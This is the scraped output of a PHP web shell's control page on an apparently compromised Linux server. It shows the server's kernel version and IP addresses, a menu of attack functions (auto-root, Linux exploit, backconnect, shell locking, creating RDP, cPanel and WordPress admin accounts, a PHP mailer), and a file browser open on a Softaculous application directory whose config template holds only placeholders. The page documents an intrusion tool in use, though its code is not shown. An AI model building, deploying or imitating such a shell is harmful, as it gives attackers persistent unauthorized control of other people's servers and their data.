Linux server1.sbs.cy 5.14.0-362.18.1.el9_3.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jan 29 07:05:48 EST 2024 x86_64
Apache
: 199.192.25.12 | : 172.70.127.92
28 Domain
8.1.31
administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
var /
softaculous /
maian /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
_cfg.php
1.53
KB
-rw-r--r--
changelog.txt
12.17
KB
-rw-r--r--
clone.php
6.23
KB
-rw-r--r--
edit.php
5.09
KB
-rw-r--r--
edit.xml
447
B
-rw-r--r--
extend.php
9.03
KB
-rw-r--r--
fileindex.php
90
B
-rw-r--r--
import.php
3.85
KB
-rw-r--r--
info.xml
3.29
KB
-rw-r--r--
install.js
1.17
KB
-rw-r--r--
install.php
5.39
KB
-rw-r--r--
install.xml
1.14
KB
-rw-r--r--
md5
1.37
KB
-rw-r--r--
notes.txt
790
B
-rw-r--r--
update_pass.php
508
B
-rw-r--r--
upgrade.php
4.65
KB
-rw-r--r--
upgrade.xml
356
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _cfg.php
<?php /*---------------------------------------------------------------------------------- SAMPLE CONFIG FILE: Rename or copy this file as '_cfg.php'. EDIT VALUES ON THE RIGHT, DO NOT CHANGE THE VALUES IN CAPITALS!!! ------------------------------------------------------------------------------------*/ /* DATABASE CONNECTION If you are unsure of your database credentials, contact your host ----------------------------------------------------------------------*/ /* MySQL host */ define('DB_HOST', '[[softdbhost]]'); /* MySQL username */ define('DB_USER', '[[softdbuser]]'); /* MySQL password */ define('DB_PASS', '[[softdbpass]]'); /* MySQL database name */ define('DB_NAME', '[[softdb]]'); /* Table prefix. You can have multiple installations in one database if you give each a unique prefix. Only numbers, letters, and underscores */ define('DB_PREFIX', '[[dbprefix]]'); /* Charset used to create database tables. If unsure, don't change. */ define('DB_CHAR_SET', 'utf8'); /* MySQL locale. If unsure, don't change. http://dev.mysql.com/doc/refman/5.0/en/locale-support.html */ define('DB_LOCALE', 'en_GB'); /* MySQL date/time adjustment. You can also use 'system'. May not need changing. */ define('DB_TIMEZONE', '+00:00'); /* SECURITY SALT / HASH Random mix of alphanumeric and special characters to encrypt session/cookie data. Generate hash @ https://www.maianmedia.com/services/keys/ -----------------------------------------------------------------------------------------*/ define('SECRET_KEY', '[[SECRET_KEY]]'); ?>
Close